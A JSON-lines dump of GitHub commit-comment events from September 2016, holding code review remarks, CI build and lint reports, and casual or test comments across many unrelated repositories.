{"id":"4565481849","type":"CommitCommentEvent","actor":{"login":"saudet"},"repo":{"name":"deeplearning4j/libnd4j"},"payload":{"comment":{"id":19029047,"position":null,"line":null,"path":null,"commit_id":"1af297967e0a45ed44489ead826695121037aad3","created_at":"2016-09-15T00:40:28Z","updated_at":"2016-09-15T00:40:28Z","body":"@treo I get that CMake has issues with that, but now libnd4j gets linked differently on Linux because it no longer links with $ORIGIN but with $$ORIGIN. We may have issues because of that, so please make it so that it still links with $ORIGIN on Linux, not $$ORIGIN, thank you.\r\n```\r\n$ readelf -d blasbuild/cpu/blas/libnd4j.so  | grep RPATH\r\n 0x000000000000000f (RPATH)              Library rpath: [$$ORIGIN/]\r\n```\r\nThis needs to be $ORIGIN, *not* $$ORIGIN."}},"created_at":"2016-09-15T00:40:28Z"}
{"id":"4565481995","type":"CommitCommentEvent","actor":{"login":"YY3ai2ui24"},"repo":{"name":"aidma-playground/socket.io-chat"},"payload":{"comment":{"id":19029048,"position":7,"line":14,"path":"client.js","commit_id":"c4eefdb37bc81e246eee0adaa2fa584f2a4b9527","created_at":"2016-09-15T00:40:31Z","updated_at":"2016-09-15T00:40:31Z","body":"@yyuho \r\nメールでの伝え方が悪く、申し訳なかったのですが、\r\n`var askUserName = function askUserName(){`\r\nではなく、\r\n`function askUserName(){`\r\nでも動くはずなので、試してみてください。\r\n\r\n内部的には変わらないので変更しなくてもよいのですが、可読性としては後者のほうがスッキリします。"}},"created_at":"2016-09-15T00:40:31Z"}
{"id":"4565482484","type":"CommitCommentEvent","actor":{"login":"wuhuhuan"},"repo":{"name":"wuhuhuan/ww"},"payload":{"comment":{"id":19029049,"position":1,"line":1,"path":"README.md","commit_id":"5bee794ead53272a415c4d3dbbad86a23b2bce16","created_at":"2016-09-15T00:40:43Z","updated_at":"2016-09-15T00:40:43Z","body":"make love"}},"created_at":"2016-09-15T00:40:43Z"}
{"id":"4565484736","type":"CommitCommentEvent","actor":{"login":"raghupal"},"repo":{"name":"raghupal/Mytest"},"payload":{"comment":{"id":19029053,"position":null,"line":null,"path":null,"commit_id":"31b780d9be2b3c8385ed0843c5d7741f13707a27","created_at":"2016-09-15T00:41:31Z","updated_at":"2016-09-15T00:41:31Z","body":"\r\n[Array.docx](https://github.com/raghupal/Mytest/files/473703/Array.docx)\r\n"}},"created_at":"2016-09-15T00:41:31Z"}
{"id":"4565485725","type":"CommitCommentEvent","actor":{"login":"aminmarashi"},"repo":{"name":"binary-com/binary-static"},"payload":{"comment":{"id":19029055,"position":null,"line":null,"path":null,"commit_id":"ae591512d5e09065656d5d657e73d8554ba8d51f","created_at":"2016-09-15T00:41:54Z","updated_at":"2016-09-15T00:41:54Z","body":"@Shashank-In http://www.testingsecurity.com/whitelists_vs_blacklists"}},"created_at":"2016-09-15T00:41:54Z"}
{"id":"4565488886","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19029061,"position":null,"line":null,"path":null,"commit_id":"0997ad0eec80c2609a372526bdfc30604541ec0c","created_at":"2016-09-15T00:42:59Z","updated_at":"2016-09-15T00:42:59Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2369 of 2370 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T00:42:59Z"}
{"id":"4565490814","type":"CommitCommentEvent","actor":{"login":"pyokagan"},"repo":{"name":"zhijietan94/rcs"},"payload":{"comment":{"id":19029067,"position":null,"line":null,"path":null,"commit_id":"14151f761fd918c52d0551a3f0b4142440454543","created_at":"2016-09-15T00:43:39Z","updated_at":"2016-09-15T00:43:39Z","body":"@lestertj It's add your own name to the first line of the file leh"}},"created_at":"2016-09-15T00:43:39Z"}
{"id":"4565493079","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19029074,"position":null,"line":null,"path":null,"commit_id":"05914194c65b8acdf6cda250d2facc075e331f3a","created_at":"2016-09-15T00:44:25Z","updated_at":"2016-09-15T00:44:25Z","body":"Extracting the sender from the first line would make it easier for the server, don't you think?\r\n\r\nE.g. For usage in errorReply()"}},"created_at":"2016-09-15T00:44:25Z"}
{"id":"4565494288","type":"CommitCommentEvent","actor":{"login":"blabla2410"},"repo":{"name":"blabla2410/ASDASD"},"payload":{"comment":{"id":19029076,"position":null,"line":null,"path":null,"commit_id":"83fffa98ecb381a271ed1f19bbd89edeaf24ce64","created_at":"2016-09-15T00:44:50Z","updated_at":"2016-09-15T00:44:50Z","body":"dfsdfsdfsdfsdffd"}},"created_at":"2016-09-15T00:44:50Z"}
{"id":"4565496085","type":"CommitCommentEvent","actor":{"login":"blabla2410"},"repo":{"name":"blabla2410/ASDASD"},"payload":{"comment":{"id":19029084,"position":1,"line":1,"path":"README.md","commit_id":"83fffa98ecb381a271ed1f19bbd89edeaf24ce64","created_at":"2016-09-15T00:45:28Z","updated_at":"2016-09-15T00:45:28Z","body":"dfsdfsfdfsdfsf"}},"created_at":"2016-09-15T00:45:28Z"}
{"id":"4565497196","type":"CommitCommentEvent","actor":{"login":"JosephSM"},"repo":{"name":"alexmancheno/OOP-in-C-Course-Assignments"},"payload":{"comment":{"id":19029089,"position":null,"line":null,"path":null,"commit_id":"8f89ef4696a077c8e819a838241cbd071b1fdd5d","created_at":"2016-09-15T00:45:52Z","updated_at":"2016-09-15T00:45:52Z","body":"This looks awesome~!\r\ncool solution. Whats the problem? it ran fine on repl.it"}},"created_at":"2016-09-15T00:45:52Z"}
{"id":"4565502353","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19029096,"position":7,"line":16,"path":"src/node_jsvmapi_types.h","commit_id":"649d595f2a8ed1e65b7ffbd3d1793cd3bc750dc6","created_at":"2016-09-15T00:47:38Z","updated_at":"2016-09-15T00:47:38Z","body":"I see in `napi_set_return_value` you assign a new persistent to the dereferenced pointer ReturnValue.  My understanding from looking at the v8 code is that `v8::Persistent<>` is copyable, so you should be able to avoid the pointer and simply copy the new value over the old value.\r\n\r\nE.g.\r\n\r\n```C++\r\nvoid napi_set_return_value(...) {\r\n   ...\r\n   cbinfo.ReturnValue = v8::Persistent<v8::Value>::New(val);\r\n}\r\n```"}},"created_at":"2016-09-15T00:47:38Z"}
{"id":"4565508154","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19029104,"position":null,"line":null,"path":null,"commit_id":"0997ad0eec80c2609a372526bdfc30604541ec0c","created_at":"2016-09-15T00:49:41Z","updated_at":"2016-09-15T00:49:41Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T00:49:41Z"}
{"id":"4565516872","type":"CommitCommentEvent","actor":{"login":"JosephSM"},"repo":{"name":"alexmancheno/OOP-in-C-Course-Assignments"},"payload":{"comment":{"id":19029115,"position":null,"line":null,"path":null,"commit_id":"8f89ef4696a077c8e819a838241cbd071b1fdd5d","created_at":"2016-09-15T00:52:44Z","updated_at":"2016-09-15T00:52:44Z","body":"u make very pretty grids man"}},"created_at":"2016-09-15T00:52:44Z"}
{"id":"4565525111","type":"CommitCommentEvent","actor":{"login":"seanho00"},"repo":{"name":"sermons/reveal-skel"},"payload":{"comment":{"id":19029130,"position":null,"line":null,"path":null,"commit_id":"8c448e88ad58baaaa35411c5d91d42e836056cfa","created_at":"2016-09-15T00:55:32Z","updated_at":"2016-09-15T00:55:32Z","body":"#8 "}},"created_at":"2016-09-15T00:55:32Z"}
{"id":"4565526526","type":"CommitCommentEvent","actor":{"login":"paramat"},"repo":{"name":"minetest/minetest_game"},"payload":{"comment":{"id":19029133,"position":31,"line":140,"path":"mods/stairs/init.lua","commit_id":"b848e35ca59c9eea3dbe3df87cb14d6bfea93f9a","created_at":"2016-09-15T00:56:02Z","updated_at":"2016-09-15T00:56:02Z","body":"Ok, i was confused, this code here then only prevents combining an unknown slab with itself, so probably isn't necessary."}},"created_at":"2016-09-15T00:56:02Z"}
{"id":"4565526828","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19029134,"position":null,"line":null,"path":null,"commit_id":"8186fd100e8c9e01a07b68f453c7b086584aee9a","created_at":"2016-09-15T00:56:10Z","updated_at":"2016-09-15T00:56:10Z","body":"I agree with you, the players would make the monster dance around fields...I don'n know the formula hehe\r\n\r\nThanks a lot dude! =)"}},"created_at":"2016-09-15T00:56:10Z"}
{"id":"4565530730","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19029142,"position":null,"line":null,"path":null,"commit_id":"e83edc6a4aa7c30f373a388953984690810f34d8","created_at":"2016-09-15T00:57:31Z","updated_at":"2016-09-15T00:57:31Z","body":"@vangheem Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/46/violations\n```\nplone/namedfile/browser.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/copy.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/file.py:291:1: C901 'getImageInfo' is too complex (15)\nplone/namedfile/marshaler.py:8:1: C901 'If 8' is too complex (13)\nplone/namedfile/scaling.py:248:1: C901 'ImageScaling.create' is too complex (13)\nplone/namedfile/scaling.py:294:41: S001 found %r formatter\nplone/namedfile/tests/base.py:54:16: P301 format call provides unused index (1)\nplone/namedfile/tests/test_scaling.py:91:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:92:70: S001 found % formatter\nplone/namedfile/tests/test_scaling.py:109:14: D001 found failIf( replace it with assertFalse\nplone/namedfile/tests/test_scaling.py:158:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:159:70: S001 found % formatter\nplone/namedfile/tests/test_scaling.py:166:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:167:72: S001 found % formatter\nplone/namedfile/tests/test_scaling.py:174:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:175:72: S001 found % formatter\nplone/namedfile/tests/test_scaling.py:215:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:216:70: S001 found % formatter\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-15T00:57:31Z"}
{"id":"4565531032","type":"CommitCommentEvent","actor":{"login":"reekypete"},"repo":{"name":"vdenotaris/spring-boot-security-saml-sample"},"payload":{"comment":{"id":19029143,"position":null,"line":null,"path":null,"commit_id":"f6a67c8846706e7f4cf9bc9007588800b6bb8b93","created_at":"2016-09-15T00:57:38Z","updated_at":"2016-09-15T00:57:38Z","body":"Works fine, thank you!"}},"created_at":"2016-09-15T00:57:38Z"}
{"id":"4565533257","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19029146,"position":null,"line":null,"path":null,"commit_id":"4690540c42a8e8ff28f6f35202cbd300d0f765f2","created_at":"2016-09-15T00:58:24Z","updated_at":"2016-09-15T00:58:24Z","body":"@vangheem Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/47/violations\n```\nplone/namedfile/browser.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/file.py:291:1: C901 'getImageInfo' is too complex (15)\nplone/namedfile/scaling.py:173:1: C901 'DefaultImageScalingFactory.__call__' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-15T00:58:24Z"}
{"id":"4565534798","type":"CommitCommentEvent","actor":{"login":"billychou"},"repo":{"name":"billychou/practice_demo"},"payload":{"comment":{"id":19029149,"position":null,"line":null,"path":null,"commit_id":"ff242cc791f51c9135ec073a8611c72b90366dfb","created_at":"2016-09-15T00:58:59Z","updated_at":"2016-09-15T00:58:59Z","body":"python 多线程执行"}},"created_at":"2016-09-15T00:58:59Z"}
{"id":"4565535627","type":"CommitCommentEvent","actor":{"login":"scottmarlow"},"repo":{"name":"wildfly/wildfly"},"payload":{"comment":{"id":19029151,"position":null,"line":null,"path":null,"commit_id":"3bff5fde3cfc23f3999dc75c320029e69c562c40","created_at":"2016-09-15T00:59:16Z","updated_at":"2016-09-15T00:59:16Z","body":"I can also make the same change but if you would like to create a pull request, so you get credit for fixing the issue, that also is fine."}},"created_at":"2016-09-15T00:59:16Z"}
{"id":"4565536457","type":"CommitCommentEvent","actor":{"login":"59azul"},"repo":{"name":"59azul/projetos_faculdade"},"payload":{"comment":{"id":19029152,"position":null,"line":null,"path":null,"commit_id":"e02ef0e3f51bca87d2aa845f60b163b470005b7e","created_at":"2016-09-15T00:59:35Z","updated_at":"2016-09-15T00:59:35Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;DYiAMe9k&#x2F;24-projeto-1-poo\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Projeto 1 - POO</a>"}},"created_at":"2016-09-15T00:59:35Z"}
{"id":"4565542781","type":"CommitCommentEvent","actor":{"login":"bradfitz"},"repo":{"name":"bradfitz/issuemirror"},"payload":{"comment":{"id":19029169,"position":null,"line":null,"path":null,"commit_id":"635c1c53868e7eb76fc78d4d27a7dce75c9b2320","created_at":"2016-09-15T01:01:41Z","updated_at":"2016-09-15T01:01:41Z","body":"Feel free to move it."}},"created_at":"2016-09-15T01:01:41Z"}
{"id":"4565545926","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19029177,"position":null,"line":null,"path":null,"commit_id":"9129b400badd0cd3758267e75ae868f093bc807d","created_at":"2016-09-15T01:02:47Z","updated_at":"2016-09-15T01:02:47Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1762 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-15T01:02:47Z"}
{"id":"4565545946","type":"CommitCommentEvent","actor":{"login":"atlisg12"},"repo":{"name":"agirmar92/HvertFaraPeningarnir"},"payload":{"comment":{"id":19029178,"position":30,"line":169,"path":"client/js/controllers/chartController.js","commit_id":"1a811d3ce0cd38dba0e745e62ddc6f310aed5e3d","created_at":"2016-09-15T01:02:47Z","updated_at":"2016-09-15T01:02:47Z","body":"Af hverju viljum við fela miniChart-ið í töflusýninni?"}},"created_at":"2016-09-15T01:02:47Z"}
{"id":"4565546420","type":"CommitCommentEvent","actor":{"login":"miguel456"},"repo":{"name":"miguel456/php-ip-address-logger"},"payload":{"comment":{"id":19029179,"position":null,"line":null,"path":null,"commit_id":"7a7347db991070bfb75afb4e14a7c9090da085a8","created_at":"2016-09-15T01:02:58Z","updated_at":"2016-09-15T01:02:58Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Aw3e5tkH&#x2F;3-bugfixes\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bugfixes</a>"}},"created_at":"2016-09-15T01:02:58Z"}
{"id":"4565547515","type":"CommitCommentEvent","actor":{"login":"bastimeyer"},"repo":{"name":"bastimeyer/livestreamer-twitch-gui"},"payload":{"comment":{"id":19029182,"position":null,"line":null,"path":null,"commit_id":"a5a523225d37ebc046eb0303d90e585ca80a44bc","created_at":"2016-09-15T01:03:21Z","updated_at":"2016-09-15T01:03:21Z","body":"@InfernoZeus @scowalt @NGMarmaduke \r\nThanks!"}},"created_at":"2016-09-15T01:03:21Z"}
{"id":"4565547733","type":"CommitCommentEvent","actor":{"login":"JosephSM"},"repo":{"name":"alexmancheno/OOP-in-C-Course-Assignments"},"payload":{"comment":{"id":19029184,"position":null,"line":null,"path":null,"commit_id":"8f89ef4696a077c8e819a838241cbd071b1fdd5d","created_at":"2016-09-15T01:03:25Z","updated_at":"2016-09-15T01:03:25Z","body":"my only suggestion would change the solutioncount++ (s++) part out of ur print function\r\nsince print is doing its own thing id move it to the 8queens fxn so the code just reads more logically and u can see the steps laid out. \r\nExample here.\r\nhttps://repl.it/DaAS/0"}},"created_at":"2016-09-15T01:03:25Z"}
{"id":"4565548650","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19029186,"position":null,"line":null,"path":null,"commit_id":"9129b400badd0cd3758267e75ae868f093bc807d","created_at":"2016-09-15T01:03:46Z","updated_at":"2016-09-15T01:03:46Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T01:03:46Z"}
{"id":"4565551248","type":"CommitCommentEvent","actor":{"login":"jaredpalmer"},"repo":{"name":"jaredpalmer/react-production-starter"},"payload":{"comment":{"id":19029190,"position":null,"line":null,"path":null,"commit_id":"beda13dcebe72fc909451f5ee02b02d50c5a9b2e","created_at":"2016-09-15T01:04:46Z","updated_at":"2016-09-15T01:04:46Z","body":"Yes. Will also drop redial for redux-taxi or another solution that doesn't depend on route-level data-fetching"}},"created_at":"2016-09-15T01:04:46Z"}
{"id":"4565555072","type":"CommitCommentEvent","actor":{"login":"atlisg12"},"repo":{"name":"agirmar92/HvertFaraPeningarnir"},"payload":{"comment":{"id":19029200,"position":17,"line":202,"path":"server/api.js","commit_id":"cd0a09180b5b5108714efe5dc02d5fb2c7491f5c","created_at":"2016-09-15T01:05:53Z","updated_at":"2016-09-15T01:05:53Z","body":"Besta ternary lína EVER"}},"created_at":"2016-09-15T01:05:53Z"}
{"id":"4565561653","type":"CommitCommentEvent","actor":{"login":"JobsLong"},"repo":{"name":"JobsLong/laravel-docs"},"payload":{"comment":{"id":19029211,"position":128,"line":119,"path":"application-testing.md","commit_id":"39c39061cfa8322b86145490fa5973026b42e197","created_at":"2016-09-15T01:08:17Z","updated_at":"2016-09-15T01:08:17Z","body":"上次，是上传文件吗？"}},"created_at":"2016-09-15T01:08:17Z"}
{"id":"4565562319","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19029212,"position":286,"line":376,"path":"src/node_jsvmapi.cc","commit_id":"2fdf4e86f7a08596c5fc0588c11865168699a774","created_at":"2016-09-15T01:08:33Z","updated_at":"2016-09-15T01:08:33Z","body":"Curious, why does this API require a string but Set and Get do not?"}},"created_at":"2016-09-15T01:08:33Z"}
{"id":"4565580892","type":"CommitCommentEvent","actor":{"login":"SeanTAllen"},"repo":{"name":"ponylang/ponyc"},"payload":{"comment":{"id":19029280,"position":null,"line":null,"path":null,"commit_id":"68a83a0a5c9d9246a2699d0c1045f012042618d9","created_at":"2016-09-15T01:15:33Z","updated_at":"2016-09-15T01:15:33Z","body":"This appears to break building on OSX mavericks. I'm currently fighting with the homebrew. It can't find stdatomic.h\r\n\r\nIts using a clang 6.x series compiler so I'm not sure why."}},"created_at":"2016-09-15T01:15:33Z"}
{"id":"4565584320","type":"CommitCommentEvent","actor":{"login":"yoshitetsu"},"repo":{"name":"yoshitetsu/projects"},"payload":{"comment":{"id":19029290,"position":4,"line":2,"path":"README.md","commit_id":"eed6c7a826dedf2acda316e534d4608738117b3d","created_at":"2016-09-15T01:16:46Z","updated_at":"2016-09-15T01:16:46Z","body":"fafafadsfasfsafsdad"}},"created_at":"2016-09-15T01:16:46Z"}
{"id":"4565586036","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"racket/racket"},"payload":{"comment":{"id":19029294,"position":15,"line":314,"path":"pkgs/racket-doc/xml/xml.scrbl","commit_id":"38622ce2767a36920c34b4b196d49fbbcca1b41d","created_at":"2016-09-15T01:17:24Z","updated_at":"2016-09-15T01:17:24Z","body":"Okay, I think it's safe to leave it as is"}},"created_at":"2016-09-15T01:17:24Z"}
{"id":"4565587812","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19029300,"position":null,"line":null,"path":null,"commit_id":"91c07c5227361ac051e7c27ef468aacea711c677","created_at":"2016-09-15T01:18:07Z","updated_at":"2016-09-15T01:18:07Z","body":"makingPrettyTransition (mitchute) - i386-Windows-7-VisualStudio-12: OK (2328 of 2335 tests passed, 24 test warnings)\n\n * 10 tests had: AUD diffs.\n * 31 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n * 21 tests had: EIO diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T01:18:07Z"}
{"id":"4565591651","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19029310,"position":null,"line":null,"path":null,"commit_id":"0997ad0eec80c2609a372526bdfc30604541ec0c","created_at":"2016-09-15T01:19:30Z","updated_at":"2016-09-15T01:19:30Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-15T01:19:30Z"}
{"id":"4565603860","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19029348,"position":355,"line":519,"path":"src/node_jsvmapi.cc","commit_id":"2fdf4e86f7a08596c5fc0588c11865168699a774","created_at":"2016-09-15T01:24:04Z","updated_at":"2016-09-15T01:24:04Z","body":"Huh, no way to see if an object is a symbol?  Looks like `v8::String` is the type used for Symbols.  Is there not a way to ask if a string is a symbol?"}},"created_at":"2016-09-15T01:24:04Z"}
{"id":"4565604655","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19029351,"position":355,"line":519,"path":"src/node_jsvmapi.cc","commit_id":"2fdf4e86f7a08596c5fc0588c11865168699a774","created_at":"2016-09-15T01:24:24Z","updated_at":"2016-09-15T01:24:24Z","body":"Probably not too important since this version of v8 was probably from before ES6 was published."}},"created_at":"2016-09-15T01:24:24Z"}
{"id":"4565607553","type":"CommitCommentEvent","actor":{"login":"Silph-Road"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":19029357,"position":null,"line":null,"path":null,"commit_id":"eeb9f406066b4f10794f8502b44b70bdb3b61f34","created_at":"2016-09-15T01:25:30Z","updated_at":"2016-09-15T01:25:30Z","body":"heyy check out the discord!"}},"created_at":"2016-09-15T01:25:30Z"}
{"id":"4565608394","type":"CommitCommentEvent","actor":{"login":"Silph-Road"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":19029362,"position":null,"line":null,"path":null,"commit_id":"eeb9f406066b4f10794f8502b44b70bdb3b61f34","created_at":"2016-09-15T01:25:50Z","updated_at":"2016-09-15T01:25:50Z","body":"@jjskuld heyy check out the discord!"}},"created_at":"2016-09-15T01:25:50Z"}
{"id":"4565610322","type":"CommitCommentEvent","actor":{"login":"edmundsfly"},"repo":{"name":"Djokic/marois-php"},"payload":{"comment":{"id":19029372,"position":null,"line":null,"path":null,"commit_id":"10287232b4894e0cc669a0fddd43e177977633af","created_at":"2016-09-15T01:26:31Z","updated_at":"2016-09-15T01:26:31Z","body":"Created this file so that the Acheteurs section can have it's own header message in the event I want to change \"L'equipe de courtiers....\""}},"created_at":"2016-09-15T01:26:31Z"}
{"id":"4565617246","type":"CommitCommentEvent","actor":{"login":"0xae"},"repo":{"name":"0xae/asyncps"},"payload":{"comment":{"id":19029391,"position":null,"line":null,"path":null,"commit_id":"2b094167edb5fca9ce8b4f1b30730a6d9b0f9a52","created_at":"2016-09-15T01:29:12Z","updated_at":"2016-09-15T01:29:12Z","body":"Looks pretty well to me yaw"}},"created_at":"2016-09-15T01:29:12Z"}
{"id":"4565618547","type":"CommitCommentEvent","actor":{"login":"jieyu"},"repo":{"name":"Gilbert88/mesos"},"payload":{"comment":{"id":19029395,"position":58,"line":618,"path":"src/slave/containerizer/mesos/containerizer.cpp","commit_id":"2fd30198fdf446375c7c82aaa82d7d7bf7f22ffc","created_at":"2016-09-15T01:29:40Z","updated_at":"2016-09-15T01:29:40Z","body":"I thought you already moved those to paths.hpp|cpp?"}},"created_at":"2016-09-15T01:29:40Z"}
{"id":"4565620603","type":"CommitCommentEvent","actor":{"login":"Vultraz"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19029398,"position":84,"line":29,"path":"src/about.cpp","commit_id":"476027f239f2c86169ad088bbfe6024c0ad2d1f6","created_at":"2016-09-15T01:30:23Z","updated_at":"2016-09-15T01:30:23Z","body":"Ah, that was there before and I forgot to remove it."}},"created_at":"2016-09-15T01:30:23Z"}
{"id":"4565628868","type":"CommitCommentEvent","actor":{"login":"chriscoding-com"},"repo":{"name":"chriscoding-com/Java"},"payload":{"comment":{"id":19029416,"position":null,"line":null,"path":null,"commit_id":"f5084780786d8129b6b707817ee8a2d15fcfa9bb","created_at":"2016-09-15T01:33:20Z","updated_at":"2016-09-15T01:33:20Z","body":"Hidden message!: TABS not good in Git"}},"created_at":"2016-09-15T01:33:20Z"}
{"id":"4565630739","type":"CommitCommentEvent","actor":{"login":"petebachant"},"repo":{"name":"HomelessAnimalProject/HomelessAnimalProject.github.io"},"payload":{"comment":{"id":19029425,"position":22,"line":48,"path":"index.html","commit_id":"acddc32b062a10e878171f98340b1b0ecea1fd03","created_at":"2016-09-15T01:33:56Z","updated_at":"2016-09-15T01:33:56Z","body":"Put this line back"}},"created_at":"2016-09-15T01:33:56Z"}
